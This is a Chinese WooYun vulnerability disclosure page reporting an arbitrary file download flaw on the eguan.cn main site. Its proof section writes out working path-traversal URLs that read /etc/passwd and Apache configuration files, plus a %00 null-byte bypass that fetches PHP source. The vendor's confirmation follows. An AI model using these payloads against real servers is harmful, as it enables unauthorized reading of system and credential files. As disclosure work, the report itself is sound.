当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-016718

漏洞标题:易观网主站任意文件读取,导致大量敏感信息泄露

相关厂商:易观网

漏洞作者: txcbg

提交时间:2012-12-31 09:36

修复时间:2013-02-14 09:36

公开时间:2013-02-14 09:36

漏洞类型:敏感信息泄露

危害等级:高

自评Rank:12

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-12-31: 细节已通知厂商并且等待厂商处理中
2013-01-04: 厂商已经确认,细节仅向厂商公开
2013-01-14: 细节向核心白帽子及相关领域专家公开
2013-01-24: 细节向普通白帽子公开
2013-02-03: 细节向实习白帽子公开
2013-02-14: 细节向公众公开

简要描述:

易观网主站任意文件读取,导致大量敏感信息泄露。

详细说明:

易观网主站存在任意文件下载漏洞,从而可以读取服务器上的任意文件(权限允许的情况下),然后服务器上的用户信息、Apache配置文件、虚拟主机配置文件、MySQL配置文件等
等大量敏感信息都可以读取了。还可以读取网站目录下的任意文件。幸亏你们的数据库连接配置文件config.inc.php藏得深,一时没找到,不然也可以读取。一旦读取到,服务器上的所有数据库面临泄露的风险。

漏洞证明:

访问http://www.eguan.cn/download/download.php?aid=151208&path=/../../../../../etc/passwd,就可以下载passwd文件了,如图1,然后看到了服务器上的所有用户信息,如
图2。
http://www.eguan.cn/download/download.php?aid=151208&path=/../../../../../etc/httpd/conf/httpd.conf,下载了Apache的配置文件httpd.conf。
http://www.eguan.cn/download/download.php?aid=151208&path=/../../../../../etc/httpd/conf/virtualhost,下载了Apache的虚拟主机配置文件virtualhost,可以读取所有易观网的网
站的物理路径,如图3。
另外还可以读取的敏感文件有my.cnf等。
直接构造http://www.eguan.cn/download/download.php?aid=151208&path=/../../../../../var/www/html/wwwroot/i/login.php会提示不让下载,但发现地址最后加上%00就可以下载到
php文件了,访问http://www.eguan.cn/download/download.php?aid=151208&path=/../../../../../var/www/html/wwwroot/i/login.php%00,成功下载到了易观网用户登录的文件,并看到
了文件的源代码,如图4,5。

1.jpg


2.jpg


3.jpg


4.jpg


5.jpg

修复方案:

管理员懂的。

版权声明:转载请注明来源 txcbg@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2013-01-04 09:51

厂商回复:

这个问题很严重 感谢 txcbg 对易观网的关注 我们正在修复这个问题 再次万分感谢

最新状态:

暂无


漏洞评价:

评论